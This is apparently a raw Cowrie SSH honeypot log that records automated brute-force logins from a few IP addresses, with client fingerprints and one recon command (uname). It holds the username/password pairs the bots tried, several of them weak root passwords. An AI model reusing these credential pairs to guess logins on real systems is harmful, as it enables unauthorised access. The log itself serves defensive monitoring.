{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:15.203761Z","src_ip":"83.168.105.65","session":"eb505706bc87"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:15.243092Z","src_ip":"83.168.105.65","session":"eb505706bc87"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:29:15.363446Z","src_ip":"83.168.105.65","session":"eb505706bc87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:29:15.459872Z","src_ip":"83.168.105.65","session":"eb505706bc87"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:29:15.460845Z","src_ip":"83.168.105.65","session":"eb505706bc87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:15.501094Z","src_ip":"83.168.105.65","session":"eb505706bc87"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:15.502164Z","src_ip":"83.168.105.65","session":"eb505706bc87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52674,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f5478bb1bda","protocol":"ssh","message":"New connection: 212.227.125.160:52674 (1.2.3.4:22) [session: 1f5478bb1bda]","sensor":"my-vps","timestamp":"2025-08-26T11:29:17.119690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:17.120597Z","src_ip":"212.227.125.160","session":"1f5478bb1bda"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:17.170294Z","src_ip":"212.227.125.160","session":"1f5478bb1bda"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:29:17.328804Z","src_ip":"212.227.125.160","session":"1f5478bb1bda"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:29:17.518986Z","src_ip":"212.227.125.160","session":"1f5478bb1bda"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:29:17.519727Z","src_ip":"212.227.125.160","session":"1f5478bb1bda"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:17.586097Z","src_ip":"212.227.125.160","session":"1f5478bb1bda"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:17.587158Z","src_ip":"212.227.125.160","session":"1f5478bb1bda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53442,"dst_ip":"1.2.3.4","dst_port":22,"session":"11389a37cc69","protocol":"ssh","message":"New connection: 212.227.125.160:53442 (1.2.3.4:22) [session: 11389a37cc69]","sensor":"my-vps","timestamp":"2025-08-26T11:29:24.267189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:24.562761Z","src_ip":"212.227.125.160","session":"11389a37cc69"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:24.563498Z","src_ip":"212.227.125.160","session":"11389a37cc69"}
{"eventid":"cowrie.login.failed","username":"system","password":"system","message":"login attempt [system/system] failed","sensor":"my-vps","timestamp":"2025-08-26T11:29:25.112473Z","src_ip":"212.227.125.160","session":"11389a37cc69"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:26.164629Z","src_ip":"212.227.125.160","session":"11389a37cc69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54212,"dst_ip":"1.2.3.4","dst_port":22,"session":"7194ce2b1686","protocol":"ssh","message":"New connection: 212.227.125.160:54212 (1.2.3.4:22) [session: 7194ce2b1686]","sensor":"my-vps","timestamp":"2025-08-26T11:29:30.676240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:30.706710Z","src_ip":"212.227.125.160","session":"7194ce2b1686"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":49208,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6a4ca271ddd","protocol":"ssh","message":"New connection: 83.168.105.65:49208 (1.2.3.4:22) [session: f6a4ca271ddd]","sensor":"my-vps","timestamp":"2025-08-26T11:29:30.710516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:30.711182Z","src_ip":"83.168.105.65","session":"f6a4ca271ddd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:30.746630Z","src_ip":"212.227.125.160","session":"7194ce2b1686"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:30.748008Z","src_ip":"83.168.105.65","session":"f6a4ca271ddd"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:29:30.858221Z","src_ip":"83.168.105.65","session":"f6a4ca271ddd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:29:31.004955Z","src_ip":"83.168.105.65","session":"f6a4ca271ddd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:29:31.006068Z","src_ip":"83.168.105.65","session":"f6a4ca271ddd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:31.043797Z","src_ip":"83.168.105.65","session":"f6a4ca271ddd"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:31.044959Z","src_ip":"83.168.105.65","session":"f6a4ca271ddd"}
{"eventid":"cowrie.login.failed","username":"zrybs","password":"zrybs","message":"login attempt [zrybs/zrybs] failed","sensor":"my-vps","timestamp":"2025-08-26T11:29:31.065459Z","src_ip":"212.227.125.160","session":"7194ce2b1686"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:32.121228Z","src_ip":"212.227.125.160","session":"7194ce2b1686"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54980,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7c64f96fcbe","protocol":"ssh","message":"New connection: 212.227.125.160:54980 (1.2.3.4:22) [session: a7c64f96fcbe]","sensor":"my-vps","timestamp":"2025-08-26T11:29:35.610807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:35.611715Z","src_ip":"212.227.125.160","session":"a7c64f96fcbe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:35.673302Z","src_ip":"212.227.125.160","session":"a7c64f96fcbe"}
{"eventid":"cowrie.login.failed","username":"student","password":"student","message":"login attempt [student/student] failed","sensor":"my-vps","timestamp":"2025-08-26T11:29:36.567855Z","src_ip":"212.227.125.160","session":"a7c64f96fcbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59494,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8e081462597","protocol":"ssh","message":"New connection: 212.227.235.229:59494 (1.2.3.4:22) [session: d8e081462597]","sensor":"my-vps","timestamp":"2025-08-26T11:29:36.826256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:37.563032Z","src_ip":"212.227.235.229","session":"d8e081462597"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:37.563905Z","src_ip":"212.227.235.229","session":"d8e081462597"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:38.004526Z","src_ip":"212.227.125.160","session":"a7c64f96fcbe"}
{"eventid":"cowrie.login.success","username":"root","password":"babygirl","message":"login attempt [root/babygirl] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:29:40.885389Z","src_ip":"212.227.235.229","session":"d8e081462597"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:41.804168Z","src_ip":"212.227.235.229","session":"d8e081462597"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":34986,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe8fd2ab1e16","protocol":"ssh","message":"New connection: 196.251.86.249:34986 (1.2.3.4:22) [session: fe8fd2ab1e16]","sensor":"my-vps","timestamp":"2025-08-26T11:29:41.884048Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55762,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4c1d93d3d51","protocol":"ssh","message":"New connection: 212.227.125.160:55762 (1.2.3.4:22) [session: c4c1d93d3d51]","sensor":"my-vps","timestamp":"2025-08-26T11:29:42.633683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:42.669178Z","src_ip":"196.251.86.249","session":"fe8fd2ab1e16"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:29:42.669863Z","src_ip":"196.251.86.249","session":"fe8fd2ab1e16"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:29:42.685236Z","src_ip":"212.227.125.160","session":"c4c1d93d3d51"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:29:42.749015Z","src_ip":"212.227.125.160","session":"c4c1d93d3d51"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:29:43.265076Z","src_ip":"212.227.125.160","session":"c4c1d93d3d51"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"wasd","message":"login attempt [hadoop/wasd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:29:44.605625Z","src_ip":"196.251.86.249","session":"fe8fd2ab1e16"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:44.669045Z","src_ip":"212.227.125.160","session":"c4c1d93d3d51"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:29:46.193222Z","src_ip":"196.251.86.249","session":"fe8fd2ab1e16"}
